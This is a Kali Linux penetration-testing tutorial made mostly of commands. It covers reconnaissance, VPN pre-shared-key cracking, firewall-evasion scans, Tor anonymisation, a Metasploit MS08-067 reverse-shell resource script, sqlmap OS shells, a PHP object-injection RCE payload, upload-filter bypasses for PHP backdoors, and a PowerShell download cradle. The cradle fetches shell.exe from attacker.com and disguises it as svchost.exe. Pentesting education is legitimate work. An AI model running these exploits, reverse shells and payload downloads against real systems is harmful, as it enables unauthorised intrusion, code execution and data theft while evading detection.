Advanced Kali Linux Penetration Testing: Setup, Reconnaissance, and Exploitation
Environment Customization and Setup
Kali Linux provides a robust foundation for penetration testing. Customizing the desktop environment and installing supplementary tools enhances operational efficiency.
Configuring Alternate Desktop Environments
Different desktop environments cater to varying hardware capabilities and user preferences. Install Xfce, a lightweight and fast environment, alongside its plugins:
sudo apt update
sudo apt install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies
During installation, select lightdm as the default display manager. After completion, update the session manager to default to Xfce:
sudo update-alternatives --config x-session-manager
Select the xfce4-session option from the list, then log out and back in.
Similarly, Mate, LXDE, and KDE can be installed:
# Mate
sudo apt install desktop-base mate-desktop-environment
# LXDE
sudo apt install lxde-core lxde
# KDE Plasma
sudo apt install kali-defaults kali-root-login desktop-base kde-plasma-desktop
Always run update-alternatives --config x-session-manager to switch the active environment.
Deploying Custom Reconnaissance Tools
Supplementary GitHub repositories extend Kali's capabilities significantly.
Dnscan: A Python script for subdomain enumeration using wordlists.
git clone https://github.com/rbsec/dnscan.git
cd dnscan
./dnscan.py -h
Subbrute: Enumerates subdomains via public resolvers, adding an anonymity layer.
git clone https://github.com/TheRook/subbrute.git
cd subbrute
./subbrute.py -s /path/to/wordlist.txt target.org
Dirsearch: A rapid command-line directory brute-forcer.
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
./dirsearch.py -u target.org -e php,asp
Auditing VPN Endpoints with ike-scan
Internet Key Exchange (IKE) VPNs using Aggressive Mode transmit authentication hashes unencrypted. ike-scan identifies these endpoints and extracts pre-shared keys (PSK).
Install and compile the tool:
git clone https://github.com/royhills/ike-scan.git
cd ike-scan
sudo apt install autoconf
autoreconf --install
./configure
make
sudo make install
Scan a target for Aggressive Mode handshakes:
ike-scan 10.0.0.1 -M -A
If a valid group ID is required to elicit a response:
ike-scan 10.0.0.1 -M -A id=vpn_group
Capture the PSK hash to a file using the -P flag, then crack it using psk-crack:
psk-crack -d /usr/share/wordlists/rockyou.txt /path/to/captured_hash
Routing Traffic through Proxychains
To maintain anonymity, route application traffic through intermediate proxies or the Tor network.
Edit the proxy configuration file:
sudo nano /etc/proxychains.conf
Uncomment dynamic_chain or random_chain depending on the routing strategy. Append proxy server details at the bottom of the file. To use Tor:
sudo apt install tor
tor
proxychains firefox
Reconnaissance and Intelligence Gathering
Effective penetration testing relies on exhaustive data collection prior to exploitation.
Subdomain and Information Enumeration
Fierce: Discovers subdomains using DNS brute-forcing.
fierce --domain target.org --threads 8
DMitry: Extracts netcraft data, emails, and TCP port scans.
dmitry -s -e -w -p target.org
theHarvester: Aggregates emails, subdomains, and host data from public search engines.
theharvester -d target.org -l 50 -b all
WhatWeb: Identifies the underlying technologies, web frameworks, and server software.
whatweb target.org
Leveraging Shodan for IoT and Service Discovery
Shodan indexes internet-connected devices. Dorks refine searches to specific services and regions.
port:"21" country:"US": Finds FTP servers in the United States.org:"ISP Name": Filters by organization.net:192.168.0.0/24: Scans an IP range.
Use the Honeyscore service (honeyscore.shodan.io) to determine if a target IP is a honeypot.
Port Scanning and Firewall Evasion
Nmap remains the standard for network mapping.
- Service version detection skipping ping:
nmap -Pn -sV 10.0.0.1 - Aggressive scan:
nmap -A -Pn 10.0.0.1 - DNS brute-force script:
nmap -Pn -sV target.org --script dns-brute
To bypass stateless firewalls, ACK scans (-sA) map filtering rules without logging connections, while Window scans (-sW) differentiate open and closed ports through TCP window size anomalies. Idle scans (-sI) spoof packets using a zombie host, completely obscuring the attacker's IP.
Masscan: Offers unparalleled speed for large network scopes.
masscan 10.0.0.0/24 -p 80,443,22 --max-rate 1000
SSL and Directory Analysis
sslscan: Evaluates SSL/TLS configurations and identifies weak ciphers.
sslscan target.org:443
Dirb: Brute-forces web directories. It is slower then alternatives but reliable.
dirb https://target.org
Wireless Monitoring and ACL Testing
Kismet: A layer 2 wireless detector. Launch it with kismet, specify the monitor mode interface (e.g., wlan0), and configure channel hopping.
Firewalk: Determines allowed protocols through a firewall by analyzing TCP TTL expiration.
firewalk -S1-25 -i eth0 10.0.0.1 10.0.0.2
Vulnerability Assessment and Exploitation Frameworks
Web Application Proxies and Scanners
Burp Suite intercepts HTTP traffic, automates attacks, and scans for vulnerabilities. Install extensions from the BApp Store such as J2EEScan and Wsdler.
To exploit WSDL endpoints, intercept the SOAP request, parse it with Wsdler, and forward requests to Repeater for parameter manipulation.
Intruder facilitates automated payload delivery. For a login brute-force, set payload positions around username and password fields, use the Pitchfrok attack type, and assign distinct wordlists to each payload set.
Vega provides an alternative GUI-based scanner with proxy capabilities.
sudo apt install vega
vega
Exploit Databases and Router Frameworks
SearchSploit: Offline CLI utility for Exploit-DB.
searchsploit apache 2.4
searchsploit -m 12345 # Copy exploit to current directory
RouterSploit: Framework tailored for embedded device exploitation.
git clone https://github.com/reverse-shell/routersploit
cd routersploit
./rsf.py
use scanners/cisco_scan
set target 10.0.0.1
run
Metasploit Framework Automation
Initialize the database and launch the console:
sudo systemctl start postgresql
msfdb init
msfconsole
Create an isolated workspace:
workspace -a ProjectAlpha
Import Nmap XML data and query hosts:
db_import /path/to/scan.xml
hosts -c address,os_flavor
Resource scripts automate repetitive tasks. Create a file named exploit.rc:
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOSTS 10.0.0.5
set LHOST 10.0.0.10
set LPORT 8443
exploit -j
Execute the script within the console: resource exploit.rc.
Advanced Web Application Exploitation
Validating Cross-Site Scripting (XSS)
The xssValidator Burp extension uses PhantomJS and SlimerJS to verify blind XSS payloads automatically.
Launch the validation servers:
phantomjs xss.js & slimerjs slimer.js &
Configure Intruder to use the extension-generated payloads. In the Intruder options tab, add the Grep phrase from the xssValidator tab to identify successful execution in responses.
Automating SQL Injection with sqlmap
sqlmap -u "http://target.org/page.php?id=1" --dbs
Key operational flags include --tables to dump table names, --os-shell to obtain an operating system command prompt, and --tamper to bypass WAFs using evasion scripts.
Source Code Repository Exfiltration
Exposed .git or .svn directories allow attackers to reconstruct application source code.
git clone https://github.com/kost/dvcs-ripper.git
cd dvcs-ripper
./rip-git.pl -v -u http://target.org/.git/
Exploiting Race Conditions
Race conditions occur when multiple threads interact with shared data simultaneously. Using Burp Intruder, send the same request repeatedly using a Null payload. Set concurrent threads to 20-25 to trigger the vulnerability by executing the transaction in parallel.
Targeting JBoss with JexBoss
JexBoss exploits misconfigured JBoss, WebLogic, and Tomcat servers.
pip install -r requires.txt
python jexboss.py -host http://target.org:8080
PHP Object Injection
When user input is passed unsanitized to unserialize(), an attacker can manipulate object properties. If the application defines a class with magic methods like __wakeup(), craft a serialized payload:
<?php
class VulnerableClass {
public $payload = "system('id');";
}
$instance = new VulnerableClass;
echo serialize($instance);
?>
Pass the resulting serialized string via the vulnerable parameter to achieve Remote Code Execution.
Establishing Backdoors via File Uploads
Strict file upload validations can be bypassed by prepending image file headers (e.g., GIF87a) to malicious PHP code, or by using alternative extensions like .pht or .phtml.
If OS-level access is obtained via SQL injection (--os-shell), escalate to a Meterpreter session using a PowerShell download cradle:
Set-Content -Path "fetch.ps1" -Value '$downloader = New-Object System.Net.WebClient'
Add-Content -Path "fetch.ps1" -Value '$downloader.DownloadFile("http://attacker.com/shell.exe", "C:\Temp\svchost.exe")'
powershell -executionpolicy bypass -file fetch.ps1
Execute the downloaded payload locally to catch the reverse shell.
